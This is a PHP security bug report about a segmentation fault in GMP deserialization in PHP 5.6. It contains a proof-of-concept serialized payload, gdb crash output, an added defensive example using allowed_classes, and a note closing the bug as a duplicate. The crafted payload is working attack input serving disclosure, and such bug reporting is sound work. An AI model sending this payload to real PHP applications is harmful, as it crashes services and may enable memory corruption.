Sec Bug #73153 Crash with an Unexpected Object when Deserialize GMP object
Submitted: 2016-09-23 16:56 UTC Modified: 2017-01-16 13:32 UTC
From: ahihibughunter at gmail dot com Assigned:
Status: Duplicate Package: GNU MP related
PHP Version: 5.6.26 OS: Ubuntu
Private report: No CVE-ID: None
 [2016-09-23 16:56 UTC] ahihibughunter at gmail dot com
Description:
------------
Similar to #72663
When PHP tries to unserialize an unexpected object via GMP, it leads to a crash.

Test script:
---------------
<?php
class bug{
    public function __wakeup(){
        $this->bug=str_repeat('A', 0xff);
    }
}
$r='s:1:"0";a:1:{i:0;O:3:"bug":1:{s:3:"bug";R:2;}}';
$s='a:1:{i:0;C:3:"GMP":'.strlen($r).':{'.$r.'}}';
$x=unserialize($s);

Expected result:
----------------
No crash

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
RAX: 0x803df5e8aa20
RBX: 0x10007fff730e --> 0xf4f4f400f1f1f1f1
RCX: 0x7ffff7f67820 --> 0x0
RDX: 0x1007bebd1545
RSI: 0xffffeff006b --> 0x0
RDI: 0x803df5e8aa28
RBP: 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...)
RSP: 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}')
RIP: 0xbd6bea (<zend_std_get_properties+121>:   cmp    BYTE PTR [rdx+0x7fff8000],0x0)
R8 : 0x1
R9 : 0xa ('\n')
R10: 0x778
R11: 0x1e
R12: 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0
R13: 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A')
R14: 0xffffffff30e --> 0x0
R15: 0x7ffff7f7d8b0 --> 0x1
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xbd6bdf <zend_std_get_properties+110>:      lea    rdi,[rax+0x8]
   0xbd6be3 <zend_std_get_properties+114>:      mov    rdx,rdi
   0xbd6be6 <zend_std_get_properties+117>:      shr    rdx,0x3
=> 0xbd6bea <zend_std_get_properties+121>:      cmp    BYTE PTR [rdx+0x7fff8000],0x0
   0xbd6bf1 <zend_std_get_properties+128>:      je     0xbd6bf8 <zend_std_get_properties+135>
   0xbd6bf3 <zend_std_get_properties+130>:      call   0x4205e0 <__asan_report_load8@plt>
   0xbd6bf8 <zend_std_get_properties+135>:      mov    rbx,QWORD PTR [rax+0x8]
   0xbd6bfc <zend_std_get_properties+139>:      lea    r13,[rbx+0x8]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff9810 --> 0x7ffff7f7dd75 --> 0x29007d7d ('}}')
0008| 0x7fffffff9818 --> 0x10007fff730e --> 0xf4f4f400f1f1f1f1
0016| 0x7fffffff9820 --> 0x7ffff7f7b2f0 --> 0x700000008 --> 0x0
0024| 0x7fffffff9828 --> 0x7ffff7f7d890 --> 0x7ffff7f7c378 --> 0x41 ('A')
0032| 0x7fffffff9830 --> 0x7fffffff9980 --> 0x7fffffff9bc0 --> 0x7fffffff9d10 --> 0x7fffffff9f50 --> 0x7fffffffa0e0 (--> ...)
0040| 0x7fffffff9838 --> 0x74e4b7 (<gmp_unserialize+1387>:      mov    r8d,0x8)
0048| 0x7fffffff9840 --> 0x178d330 --> 0x0
0056| 0x7fffffff9848 --> 0xffffffff38c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108
108             zobj = Z_OBJ_P(object);
gdb-peda$ bt
#0  0x0000000000bd6bea in zend_std_get_properties (object=<optimized out>) at /home/z/php5/Zend/zend_object_handlers.c:108
#1  0x000000000074e4b7 in gmp_unserialize (object=<optimized out>, ce=<optimized out>, buf=<optimized out>, buf_len=<optimized out>, data=<optimized out>) at /home/z/php5/ext/gmp/gmp.c:662
#2  0x0000000000a01e9f in object_custom (ce=0x603600005e00, var_hash=0x2e, max=0x2e <error: Cannot access memory at address 0x2e>, p=0x7fffffffa030, rval=0x2e) at /home/z/php5/ext/standard/var_unserializer.c:393
#3  php_var_unserialize (rval=rval@entry=0x7fffffff9c60, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:758
#4  0x0000000000a045d2 in process_nested_data (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=max@entry=0x7ffff7f7dd77 "", var_hash=var_hash@entry=0x7fffffffa070, ht=<optimized out>, elements=0x0,
    elements@entry=0x1, objprops=<optimized out>, objprops@entry=0x0) at /home/z/php5/ext/standard/var_unserializer.c:324
#5  0x0000000000a02589 in php_var_unserialize (rval=rval@entry=0x7fffffff9f88, p=p@entry=0x7fffffffa030, max=<optimized out>, var_hash=var_hash@entry=0x7fffffffa070) at /home/z/php5/ext/standard/var_unserializer.c:842
#6  0x00000000009da822 in zif_unserialize (ht=<optimized out>, return_value=<optimized out>, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/z/php5/ext/standard/var.c:964
#7  0x0000000000d616fc in zend_do_fcall_common_helper_SPEC (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:558
#8  0x0000000000d630be in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:2602
#9  0x0000000000c148ad in execute_ex (execute_data=execute_data@entry=0x7ffff7f479d8) at /home/z/php5/Zend/zend_vm_execute.h:363
#10 0x0000000000d5caaf in zend_execute (op_array=0x7ffff7f7adc0) at /home/z/php5/Zend/zend_vm_execute.h:388
#11 0x0000000000b67b3e in zend_execute_scripts (type=type@entry=0x8, retval=retval@entry=0x0, file_count=file_count@entry=0x3) at /home/z/php5/Zend/zend.c:1341
#12 0x0000000000a48876 in php_execute_script (primary_file=primary_file@entry=0x7fffffffcf20) at /home/z/php5/main/main.c:2613
#13 0x0000000000d6604e in do_cli (argc=argc@entry=0x2, argv=argv@entry=0x60060000ee90) at /home/z/php5/sapi/cli/php_cli.c:994
#14 0x0000000000d680d6 in main (argc=argc@entry=0x2, argv=0x60060000ee90, argv@entry=0x7fffffffe668) at /home/z/php5/sapi/cli/php_cli.c:1378
#15 0x00007ffff3da7f45 in __libc_start_main (main=0xd670a2 <main>, argc=0x2, argv=0x7fffffffe668, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe658) at libc-start.c:287
#16 0x00000000004226e9 in _start ()
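Added example, not code from the bug report or from PHP itself: the defensive counterpart of the test script above, feeding the same payload shape to unserialize() with its allowed_classes option (PHP 7.0 and later; the report's PHP 5.6 has no such option). The function names unserialize_untrusted and contains_object are assumed here.

```php
<?php
// Added example, not part of the bug report. Requires PHP >= 7.0 for the
// allowed_classes option of unserialize().

// Same payload shape as the report's test script: a "C:" (custom-serialized)
// GMP entry whose inner data is not the property array gmp_unserialize() expects.
$r = 's:1:"0";a:1:{i:0;O:3:"bug":1:{s:3:"bug";R:2;}}';
$s = 'a:1:{i:0;C:3:"GMP":' . strlen($r) . ':{' . $r . '}}';

// Unserialize untrusted input with every class disallowed. A "C:" entry for a
// disallowed class is mapped to __PHP_Incomplete_Class, which has no custom
// unserializer, so the engine emits a "has no unserializer" warning and skips
// the inner data: GMP's handler, and with it the crash path, is never reached.
function unserialize_untrusted($data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// Walk the result and report whether any object (including an incomplete-class
// placeholder) survived, so callers can reject payloads that tried to smuggle
// objects into what should have been plain data.
function contains_object($value)
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

$x = unserialize_untrusted($s);
if (contains_object($x)) {
    echo "rejected: payload contained object data\n";
} else {
    var_dump($x);
}
```

On PHP 5.6, where allowed_classes is unavailable, the only equivalent protection is to keep untrusted input away from unserialize() altogether, for example by using JSON for data exchange.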

History

 [2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
-Summary: Create an Unexpected Object when Deserialize GMP object +Summary: Crash with an Unexpected Object when Deserialize GMP object
 [2016-09-23 16:59 UTC] ahihibughunter at gmail dot com
change name
 [2017-01-16 13:32 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-01-16 13:32 UTC] nikic@php.net
This is a duplicate of sec bug #70513.
Last updated: Thu Feb 27 16:01:29 2020 UTC